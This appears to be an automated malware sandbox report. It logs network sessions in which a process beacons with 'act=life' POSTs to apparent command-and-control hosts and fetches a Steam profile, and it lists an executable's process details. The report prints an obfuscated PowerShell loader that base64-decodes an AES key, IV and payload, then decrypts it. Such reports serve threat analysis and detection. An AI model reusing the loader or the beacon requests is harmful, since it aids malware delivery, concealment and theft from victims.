2024-09-26 19:06:15 UTC	772	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 19:06:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8d15bhmog7jdcipggshlr32vn3; expires=Mon, 20 Jan 2025 12:52:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dJHyYBOb4i0RRf0CI9R4JMzA8DiO6o2ubPOgJbiY4GMa1pPmB%2BH8OnGWgKTLXdBgwNsYRwj0UTYSGZ4eW0bFjt3I1ku5SnSMrtwhjrORRoTuAynZ%2BPo%2BhCzwkBtI5g2aPJ5jalg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9587b22e28159f-EWR
2024-09-26 19:06:15 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 19:06:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49739	172.67.208.139	443	3328	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 19:06:15 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: reinforcenh.shop
2024-09-26 19:06:15 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 19:06:16 UTC	772	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 19:06:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8n8th0qv7301c6lerks5hg6sg0; expires=Mon, 20 Jan 2025 12:52:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=84yIdqz2u47%2F6pm0wt9h323qubwqd8Xgm%2BsvU93RASklqe0dqwThZC4n%2FzT5au4lIc6wd7q%2FolGIuc8dglDtY2EYWKXbS69HOS572e3InHIF%2BLAvsp1zi7z%2FH1D6yswz1kOr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9587b9adcc4387-EWR
2024-09-26 19:06:16 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 19:06:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49740	104.102.49.254	443	3328	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 19:06:17 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-09-26 19:06:17 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Thu, 26 Sep 2024 19:06:17 GMT Content-Length: 34663 Connection: close Set-Cookie: sessionid=d15d3f3051eed828176ec52c; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-09-26 19:06:17 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-09-26 19:06:17 UTC	16384	IN	Data Raw: 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6d 65 6e 75 22 20 61 Data Ascii: ernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global_action_menu" a
2024-09-26 19:06:17 UTC	3765	IN	Data Raw: 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 63 6f 6e 74 65 6e 74 20 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 Data Ascii: e info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></div></div><div class="profile_content "><div class="p

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49741	104.21.2.13	443	3328	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 19:06:18 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: ballotnwu.site
2024-09-26 19:06:18 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 19:06:18 UTC	776	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 19:06:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=t1cn5v476grlkicc8t5n0tqii1; expires=Mon, 20 Jan 2025 12:52:57 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Txc%2FfXVOoPSqpyciFct0ld6SUIdptBl%2B02YG%2FXVRPlMsbtmgoof5E%2F82AcwRCG%2BiQMEzFhwdiDAtUuBCfs4g3Gyh3cSNB33rvv2IQiq38rqOKZLI5Gt12WSaObSD%2FrVdYQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9587c919d7c33d-EWR
2024-09-26 19:06:18 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 19:06:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	15:06:02
Start date:	26/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x710000
File size:	11'134'263 bytes
MD5 hash:	A2B2889063A7A3F9785253F937EE6FE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	15:06:02
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" $keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt = 'RrQCwf6yfelfaItjSpP5Lem05xyCdtLsxmDjvXtJ1qg=' $q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9 = '6IxK6qxMw723JyOLkLhRJQ==' $g3IdvVQ10UZ3mjgOOC4LurmdlMAGVKu1DWO8QDt8FRkfZgftPg9NTZzpg4rjVJFQ0yZ14IxKIwFcGHOF6GqfbgIeWZrmLKMwM3P1QOYHjYEVTVi9QmMPTZfjplFFRLzykJ0crmoShjwMclUyhR5Yxwcmo5b4ITq7ZGcKwFi3yu7932HE1GYzfaAn6doWKTKYtYn5IJCb = 'WbVnOuXFi5VdHFvlH8VLFLqCHp99aV7e98o0gKg8BrhdO82KvBRZpWVPfobXuKseH2pcy+l2TCyJfEhiDTSGGhJ2bJvrEd6Jn8YMDA6pagITIvCFAADHRiYf6jzMgSg3g8UJC89M0/qyyYaD5SUZY09/C7hNOKP6OpvYqwARJOWKpo0FJsUgtYh9Z0IZlTmfDQLMYRSBjoiyerwB+uMGBe9S1HbIS2rXnOPeWVFaU7p8cQ6Jxhs8X8AuEu9Yx+vBQ6OczGSU/bolI7fal5uBeBcaL8Sg53utSrbZM7gDvNtm0rtIDox3Ud/axb3HTk3OWmX9S1HPE4fRmPvy2+fvSsNEUCuaqkThljRKwYtzlgI=' function 9B0DZDTVY7CBvqsoFpdTRVTejJgFfbvSEm0dKxY3U1xdQI2C6y0T6jUMilTPXNgmbkwI0OdI1JypYgYagd8gLclW2NvYdIGGlLB5MTcRURsVk4nCXi9jfzazzagNTO5TDrENfsYVAQVukYbxZsBu8V1laB6bdZyFm8Ts0aX5UMjYdgPazjo0Nakg0SddWmjbSQHLFi6p ($MKO9YVaiER8NdDIeOBdsIqsAOI7oy0TeePaJbrja8LVAWCuoFU4f6lMWROWQolkdxt8Y2yCXSCUx4rfLNjidvdItCOrX62lm0iC235WHRHX31Pq09JCFDGiUkfVNGfrpR76mpMhiXbVnPe1mY1oV0fjUzihnJHAbQ8LujEbV1Ui1juEFN9pfq5ZcnLmG5t8Pak7g27DT, $keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt, $q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9) { $56aVdDIumwbta7sLoc2IwkJ72HFX8E4RMzvhAXDXJjqZKpAkYwV2PYslVCt6xlWi1UhbcKK19FyNtkVdGWzchCBnGJWx37ZYXIxqHZINlvtK0esbgQZcmjAZSu42pMxBf9pkm55hMlqmIrX2RjRNHnceI87NufX8xs4qoHoKliZAsNR07CLFvkurwLcNyRm7YRpQV6dJ = [Convert]::FromBase64String($keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt) $vG1ZYcluRGgs4SdNycud5aM4vscbYBEAYBKoS43U0iwrauCGdbRkcAdUux35AJ5QCf33Hou3I9NneWtBq5xmjTYYXpuWByTQMfou19yohobCnqg9D2f4Mi7iREFRu92KQxay6y9Q7IFuiWb7JWR8SoE4IFdV3guHV0lpPhCEsYxDcdAv38H9Rts1tGq1WNnqOy7S9lR2 = [Convert]::FromBase64String($q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9) $TNgurAr4Fhsv8Wq38UwIqaifbGpeFhViQfQEMxasPWWeUsStHEjPoIbi4BSlLNZXWKetFlQakEt4PEUiov6ByGtID7aLfogBwyTJOYoWnJ5jOH3ZgaxPgXZOQ6p7LEvvYr7QlK4ZHKNobKtwEK5Er0W89Eth9QKjN9WX9Me5F7H5KadGdt2B9qDx6zhgRnqqA4bBo5Xs = [Convert]::FromBase64String($MKO9YVaiER8NdDIeOBdsIqsAOI7oy0TeePaJbrja8LVAWCuoFU4f6lMWROWQolkdxt8Y2yCXSCUx4rfLNjidvdItCOrX62lm0iC235WHRHX31Pq09JCFDGiUkfVNGfrpR76mpMhiXbVnPe1mY1oV0fjUzihnJHAbQ8LujEbV1Ui1juEFN9pfq5ZcnLmG5t8Pak7g27DT) $5zzUSpYy1mEfoIJX6Yqa4yOShR5gzcRH695aqjegbiP4iKCrUN5ZfnY7khdBUhzo4xJPd96mkKylik96PdWlGr2iLxpJGcWtj0zlBmOlhif4ocpAIGmhVOhc40DfjXgIoFCRkn52Y9DYMxu8IpBzpd65iVQai8CUC7fia7PUbUSmKT07656uVgSL879X7ujp7jVfSMyb = [System.Security.Cryptography.Aes]::Create() $5zzUSpYy1mEfoIJX6Yqa4yOShR5gzcRH695aqjegbiP4iKCrUN5ZfnY7khdBUhzo4xJPd96mkKylik96PdWlGr2iLxpJGcWtj0zlBmOlhif4ocpAIGmhVOhc40DfjXgIoFCRkn52Y9DYMxu8IpBzpd65iVQai8CUC7fia7PUbUSmKT07656uVgSL879X7ujp7jVfSMyb.Key = $56aVdDIumwbta7sLoc2IwkJ72HFX8E4RMzvhAXDXJjqZKpAkYwV2PYslVCt6xlWi1UhbcKK19FyNtkVdGWzchCBnGJWx37ZYXIxqHZINlvtK0esbgQZcmjAZSu42pMxBf9pkm55hMlqmIrX2RjRNHnceI87NufX8xs4qoHoKliZAsNR07CLFvkurwLcNyRm7YRpQV6dJ $5zzUSpYy1mEfoIJX6Yqa4yOShR5gzcRH695aqjegbiP4iKCrUN5ZfnY7khdBUhzo4xJPd96mkKylik96PdWlGr2iLxpJGcWtj0zlBmOlhif4ocpAIGmhVOhc40DfjXgIoFCRkn52Y9DYMxu8IpBzpd65iVQai8CUC7fia7PUbUSmKT07656uVgSL879X7ujp7jVfSMyb.IV = $vG1ZYcluRGgs4SdNycud5aM4vscbYBEAYBKoS43U0iwrauCGdbRkcAdUux35AJ5QCf33Hou3I9NneWtBq5xmjTYYXpuWByTQMfou19yohobCnqg9D2f4Mi7iREFRu92KQxay6y9Q7IFuiWb7JWR8SoE4IFdV3guHV0lpPhCEsYxDcdAv38H9Rts1tGq1WNnqOy7S9lR2 $5zzUSpYy1mEfoIJX6Yqa4yOShR5gzcRH695aqjegbiP4iKCrUN5ZfnY7khdBUhzo4xJPd96mkKylik96PdWlGr2iLxpJGcWtj0zlBmOlhif4ocpAIGmhVOhc40DfjXgIoFCRkn52Y9DYMxu8IpBzpd65iVQai8CUC7fia7PUbUSmKT07656uVgSL879X7ujp7jVfSMyb.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7 $9gY4UkUZwjENCIyWO4JCxsmga3P0xlPU6vUfSnqoMK1oq5nZlA0nCvdhuhur5t1K4jhGnTD0eWqn0ypEfpfwU1SaRdkbtySSiQTHogb2xzJgFpQvrpMfO4qC1GpJ817fC7FJeiQyNMzUSb41XpjEmdDN0Rfhr2u523d7kGQI9N1C55jqbXmii2tZ3sjXD8GlS4spxxhQ = $5zzUSpYy1mEfoIJX6Yqa4yOShR5gzcRH695aqjegbiP4iKCrUN5ZfnY7khdBUhzo4xJPd96mkKylik96PdWlGr2iLxpJGcWtj0zlBmOlhif4ocpAIGmhVOhc40DfjXgIoFCRkn52Y9DYMxu8IpBzpd65iVQai8CUC7fia7PUbUSmKT07656uVgSL879X7ujp7jVfSMyb.CreateDecryptor($5zzUSpYy1mEfoIJX6Yqa4yOShR5gzcRH695aqjegbiP4iKCrUN5ZfnY7khdBUhzo4xJPd96mkKylik96PdWlGr2iLxpJGcWtj0zlBmOlhif4ocpAIGmhVOhc40DfjXgIoFCRkn52Y9DYMxu8IpBzpd65iVQai8CUC7fia7PUbUSmKT07656uVgSL879X7ujp7jVfSMyb.Key, $5zzUSpYy1mEfoIJX6Yqa4yOShR5gzcRH695aqjegbiP4iKCrUN5ZfnY7khdBUhzo4xJPd96mkKylik96PdWlGr2iLxpJGcWtj0zlBmOlhif4ocpAIGmhVOhc40DfjXgIoFCRkn52Y9DYMxu8IpBzpd65iVQai8CUC7fia7PUbUSmKT07656uVgSL879X7ujp7jVfSMyb.IV) $8b59LBiv7pG4gLnz9OErXtEAGgjAdusef6KGxUN1JopO2cFHhsPjspsf6425ShRdw1pKBgCPAci9Dq84bcTkeJlpd4a2riJ26LRAmvFAqAiQHTbfwyufY7znfA66F9YS2PDr87hf6Sue15hUtv6sn3EyM4WmY9vQcZnrPjHZROIFdWVJSLcKC55yLEfDLvRxXdBBhpEK = New-Object System.IO.MemoryStream(, $TNgurAr4Fhsv8Wq38UwIqaifbGpeFhViQfQEMxasPWWeUsStHEjPoIbi4BSlLNZXWKetFlQakEt4PEUiov6ByGtID7aLfogBwyTJOYoWnJ5jOH3ZgaxPgXZOQ6p7LEvvYr7QlK4ZHKNobKtwEK5Er0W89Eth9QKjN9WX9Me5F7H5KadGdt2B9qDx6zhgRnqqA4bBo5Xs) $nHa8WyWrIL3MwlNGupgLEDNVxLizTU23H2VvvwdMinvA1EAbZvHsJtGkuObJQV8ojAF4YSLxL33RINusKGaXN9TOVcBgW3wVOGQ1z6NHkJgg0pbhUiyJlLbJgrImQ4ch6GCBw2tet3cDtdo7AUVc5maD5HlIY1qQ7yJTmakrpUQS87QCCalwIzMj5z5ohkQ1cV5u44k0 = New-Object System.Security.Cryptography.CryptoStream($8b59LBiv7pG4gLnz9OErXtEAGgjAdusef6KGxUN1JopO2cFHhsPjspsf6425ShRdw1pKBgCPAci9Dq84bcTkeJlpd4a2riJ26LRAmvFAqAiQHTbfwyufY7znfA66F9YS2PDr87hf6Sue15hUtv6sn3EyM4WmY9vQcZnrPjHZROIFdWVJSLcKC55yLEfDLvRxXdBBhpEK, $9gY4UkUZwjENCIyWO4JCxsmga3P0xlPU6vUfSnqoMK1oq5nZlA0nCvdhuhur5t1K4jhGnTD0eWqn0ypEfpfwU1SaRdkbtySSiQTHogb2xzJgFpQvrpMfO4qC1GpJ817fC7FJeiQyNMzUSb41XpjEmdDN0Rfhr2u523d7kGQI9N1C55jqbXmii2tZ3sjXD8GlS4spxxhQ, [System.Security.Cryptography.CryptoStreamMode]::Read) $94nK6S4xriFnftH7mZnnEwJEDpfMCV78qUVdMBNN47xyf3liOxHEhxVdUiHgcRv5L7xU74WkL9S6yLY9DwxFO2rsyjS4u6bMc2nI61LkcXtHepfJT7dfUqQigEVoLrqfxGu6YQDckN2q9jOJDJKVtwslLF22EX8l7NJ8vJlD3BuGX0IwpMkCg3mBNIUTob7XfhTW9gNu = New-Object System.IO.StreamReader($nHa8WyWrIL3MwlNGupgLEDNVxLizTU23H2VvvwdMinvA1EAbZvHsJtGkuObJQV8ojAF4YSLxL33RINusKGaXN9TOVcBgW3wVOGQ1z6NHkJgg0pbhUiyJlLbJgrImQ4ch6GCBw2tet3cDtdo7AUVc5maD5HlIY1qQ7yJTmakrpUQS87QCCalwIzMj5z5ohkQ1cV5u44k0) $YGsrBmYlw5crd5ED1HUno1Ps470gGmVJzpe9auA0k9VSzfjJdPu2W0GwrAX3WheKI2sor437HuDOFwsooQDrsuo9iih966ECvMJ6muSImVU1XrqvI8fFenSOeTGJmtAapATtmWCtyuE59XLqrm1yqzXIuvs3oJVsWkcV8xIm6mGkimeRHPSA1CkpdLzq38Ep8LJplpSt = $94nK6S4xriFnftH7mZnnEwJEDpfMCV78qUVdMBNN47xyf3liOxHEhxVdUiHgcRv5L7xU74WkL9S6yLY9DwxFO2rsyjS4u6bMc2nI61LkcXtHepfJT7dfUqQigEVoLrqfxGu6YQDckN2q9jOJDJKVtwslLF22EX8l7NJ8vJlD3BuGX0IwpMkCg3mBNIUTob7XfhTW9gNu.ReadToEnd() $94nK6S4xriFnftH7mZnnEwJEDpfMCV78qUVdMBNN47xyf3liOxHEhxVdUiHgcRv5L7xU74WkL9S6yLY9DwxFO2rsyjS4u6bMc2nI61LkcXtHepfJT7dfUqQigEVoLrqfxGu6YQDckN2q9jOJDJKVtwslLF22EX8l7NJ8vJlD3BuGX0IwpMkCg3mBNIUTob7XfhTW9gNu.Close() $nHa8WyWrIL3MwlNGupgLEDNVxLizTU23H2VvvwdMinvA1EAbZvHsJtGkuObJQV8ojAF4YSLxL33RINusKGaXN9TOVcBgW3wVOGQ1z6NHkJgg0pbhUiyJlLbJgrImQ4ch6GCBw2tet3cDtdo7AUVc5maD5HlIY1qQ7yJTmakrpUQS87QCCalwIzMj5z5ohkQ1cV5u44k0.Close() $8b59LBiv7pG4gLnz9OErXtEAGgjAdusef6KGxUN1JopO2cFHhsPjspsf6425ShRdw1pKBgCPAci9Dq84bcTkeJlpd4a2riJ26LRAmvFAqAiQHTbfwyufY7znfA66F9YS2PDr87hf6Sue15hUtv6sn3EyM4WmY9vQcZnrPjHZROIFdWVJSLcKC55yLEfDLvRxXdBBhpEK.Close() return $YGsrBmYlw5crd5ED1HUno1Ps470gGmVJzpe9auA0k9VSzfjJdPu2W0GwrAX3WheKI2sor437HuDOFwsooQDrsuo9iih966ECvMJ6muSImVU1XrqvI8fFenSOeTGJmtAapATtmWCtyuE59XLqrm1yqzXIuvs3oJVsWkcV8xIm6mGkimeRHPSA1CkpdLzq38Ep8LJplpSt } $df2DsdZHRbW8qV1TAmjXySSxhRL6cp5SxYVmagwzlr9rN6yMkqpyFuvWV4Vb1s51FDb2zfjTpkbHi0kLTzmmz7MC3BZFTW7sWHmJv5MFG5IWTndvkKR2Gi18r8zyPez4MjlaeaQnmhg4YqjfY3UJDEmcgOSV6Op25eJaBCRKu4gZCxJAoTamTq0HwIu0StQ8rOzjhJeW = 9B0DZDTVY7CBvqsoFpdTRVTejJgFfbvSEm0dKxY3U1xdQI2C6y0T6jUMilTPXNgmbkwI0OdI1JypYgYagd8gLclW2NvYdIGGlLB5MTcRURsVk4nCXi9jfzazzagNTO5TDrENfsYVAQVukYbxZsBu8V1laB6bdZyFm8Ts0aX5UMjYdgPazjo0Nakg0SddWmjbSQHLFi6p -MKO9YVaiER8NdDIeOBdsIqsAOI7oy0TeePaJbrja8LVAWCuoFU4f6lMWROWQolkdxt8Y2yCXSCUx4rfLNjidvdItCOrX62lm0iC235WHRHX31Pq09JCFDGiUkfVNGfrpR76mpMhiXbVnPe1mY1oV0fjUzihnJHAbQ8LujEbV1Ui1juEFN9pfq5ZcnLmG5t8Pak7g27DT $g3IdvVQ10UZ3mjgOOC4LurmdlMAGVKu1DWO8QDt8FRkfZgftPg9NTZzpg4rjVJFQ0yZ14IxKIwFcGHOF6GqfbgIeWZrmLKMwM3P1QOYHjYEVTVi9QmMPTZfjplFFRLzykJ0crmoShjwMclUyhR5Yxwcmo5b4ITq7ZGcKwFi3yu7932HE1GYzfaAn6doWKTKYtYn5IJCb -keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt $keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt -q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9 